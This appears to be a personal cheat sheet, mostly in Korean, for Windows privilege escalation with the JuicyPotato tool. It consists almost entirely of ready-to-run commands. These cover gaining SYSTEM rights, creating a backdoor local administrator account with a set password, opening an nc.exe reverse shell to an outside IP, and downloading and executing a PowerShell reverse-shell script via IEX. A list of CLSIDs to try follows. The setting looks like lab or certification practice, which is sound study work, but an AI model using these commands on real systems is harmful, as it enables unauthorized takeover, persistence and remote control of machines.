• https://ohpe.it/juicy-potato/
• https://ohpe.it/juicy-potato/CLSID/ - CLSID

SYSTEM 권한 확인용 간단 실행 NT AUTHORITY\\\\SYSTEM 으로 찍히면 성공.

.\\\\JuicyPotato.exe -l 1337 -p "C:\\\\Windows\\\\System32\\\\cmd.exe" -a "/c whoami /all > C:\\\\Users\\\\merlin\\\\Desktop\\\\jp.txt" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

type C:\\\\Users\\\\merlin\\\\Desktop\\\\jp.txt

새 계정 생성 & 관리자 그룹 추가

# 1) 로컬 유저 생성
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

# 2) Administrators 그룹에 추가
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

리버스쉘

# this definitely worked
.\\jp.exe -t * -p c:\\windows\\system32\\cmd.exe -a "/c C:\\Users\\apache\\Desktop\\nc.exe 192.168.45.229 1337 -e cmd.exe" -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"

# 타겟 윈도우
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.9/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

다른 CLSID

# 가장 먼저 시도 BITS 서비스 CLSID
{4991d34b-80a1-4291-83b6-3328366b9097}

# 추가로 알려진 것들
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{6d18ad12-bde3-4393-b311-099c346e6df9}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{5c6c3c20-0cf4-11d1-b95a-0060977b9152}
{BA126AD1-2166-11D1-B1D0-00805FC1270E}